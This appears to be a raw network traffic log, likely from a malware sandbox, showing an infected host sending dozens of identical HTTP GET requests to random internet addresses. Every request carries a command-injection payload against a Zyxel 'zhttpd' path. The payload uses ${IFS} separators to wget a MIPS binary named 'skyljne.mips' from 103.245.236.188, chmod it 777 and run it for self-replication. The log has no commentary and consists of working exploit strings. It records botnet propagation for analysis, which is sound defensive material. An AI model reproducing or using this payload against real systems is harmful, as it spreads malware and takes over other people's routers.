                                                Jan 12, 2024 18:24:32.768687010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3654192.168.2.135880658.100.101.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768735886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3655192.168.2.1356026101.150.35.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768760920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3656192.168.2.1340066161.231.122.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768802881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3657192.168.2.13414325.141.249.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768836975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3658192.168.2.1355652191.245.238.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768897057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3659192.168.2.1333980118.115.184.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768923998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3660192.168.2.1333166124.242.67.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.768966913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3661192.168.2.1338976210.60.85.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769017935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3662192.168.2.1335812156.211.11.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769066095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3663192.168.2.1353454189.43.219.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769115925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3664192.168.2.1351060101.178.61.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769151926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3665192.168.2.1343822213.28.119.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769196033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3666192.168.2.135183841.90.228.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769248009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3667192.168.2.134484059.8.154.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769294024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3668192.168.2.1357344126.174.29.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769318104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3669192.168.2.1350934194.3.222.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769371986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3670192.168.2.134656444.13.128.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769413948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3671192.168.2.1355662100.208.109.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769462109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3672192.168.2.1341056186.37.47.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769504070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3673192.168.2.1337618190.200.242.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769539118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3674192.168.2.135211691.104.49.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769579887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3675192.168.2.1352794154.137.215.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769607067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3676192.168.2.133538661.165.158.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769659996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3677192.168.2.1340096181.243.109.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769711971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3678192.168.2.1332804198.29.249.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769742966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3679192.168.2.133643097.168.16.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769783020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3680192.168.2.1339218102.212.211.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769823074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3681192.168.2.1333306222.206.206.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769869089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3682192.168.2.1343084187.193.83.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769921064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3683192.168.2.1356078181.142.113.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769937992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3684192.168.2.136003262.91.130.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.769977093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3685192.168.2.133391825.140.115.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770024061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3686192.168.2.1340600141.90.137.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770067930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3687192.168.2.1357472112.93.235.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770092010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3688192.168.2.134868851.52.95.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770128965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3689192.168.2.1342544201.72.126.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770153999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3690192.168.2.134182254.183.199.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770205975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3691192.168.2.1360534140.92.244.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770235062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3692192.168.2.134499818.207.158.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770298958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3693192.168.2.134428417.18.93.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770330906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3694192.168.2.134470242.14.99.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770356894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3695192.168.2.135603674.128.38.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770417929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3696192.168.2.1359108113.23.115.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770458937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3697192.168.2.135205641.37.45.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770487070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3698192.168.2.134169692.1.207.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770535946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3699192.168.2.1353208167.67.5.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770596027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3700192.168.2.1342634108.112.155.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770642042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3701192.168.2.133331691.148.221.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770684004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3702192.168.2.1347612137.71.24.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770720005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3703192.168.2.134285236.243.132.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770767927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3704192.168.2.1351882222.31.229.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770800114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3705192.168.2.1342506200.241.242.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770840883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3706192.168.2.134791895.135.87.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770869017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3707192.168.2.1347842117.246.64.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770908117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3708192.168.2.133572849.100.93.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770960093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3709192.168.2.1336366189.122.45.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.770983934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3710192.168.2.133367292.0.181.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771047115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3711192.168.2.135012248.182.237.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771059990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3712192.168.2.1350478185.186.126.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771131039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3713192.168.2.135046220.184.32.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771142960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3714192.168.2.1348728148.5.12.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771179914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3715192.168.2.1342872107.108.105.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.771229982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3716192.168.2.1337284132.14.98.207443
                                                TimestampBytes transferredDirectionData
